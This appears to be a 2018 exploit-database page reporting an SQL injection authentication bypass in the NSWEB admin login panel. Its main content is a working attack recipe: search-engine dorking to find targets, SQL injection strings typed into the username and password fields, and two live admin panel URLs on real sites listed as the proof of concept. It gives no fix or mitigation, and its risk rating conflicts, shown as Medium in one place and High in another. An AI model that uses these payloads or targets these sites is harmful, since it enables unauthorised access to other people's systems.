NSWEB Admin Login Panel SQL Injection Authentication Bypass

2018.04.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================================================== Exploit Title: NSWEB Admin Login Panel SQL Injection Authentication Bypass ========================================================================================== Risk: High ========================================================================================== Author: Ismail Tasdelen ========================================================================================== Vedor : http://www.nsweb.rs/ ========================================================================================== [+] Dorking in google or other search enggine [+] Open target [+] Enter username and password with [+] Username: 'or' '=' [+] Password: 'or' '=' [+] or as the best choice User : ' or true & " or true ========================================================================================== POC : ========================================================================================== http://www.nsweb.rs/admin http://www.nskoncept.rs/admin/ ========================================================================================== # You want to follow my activity ? ========================================================================================== https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln ==========================================================================================


Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top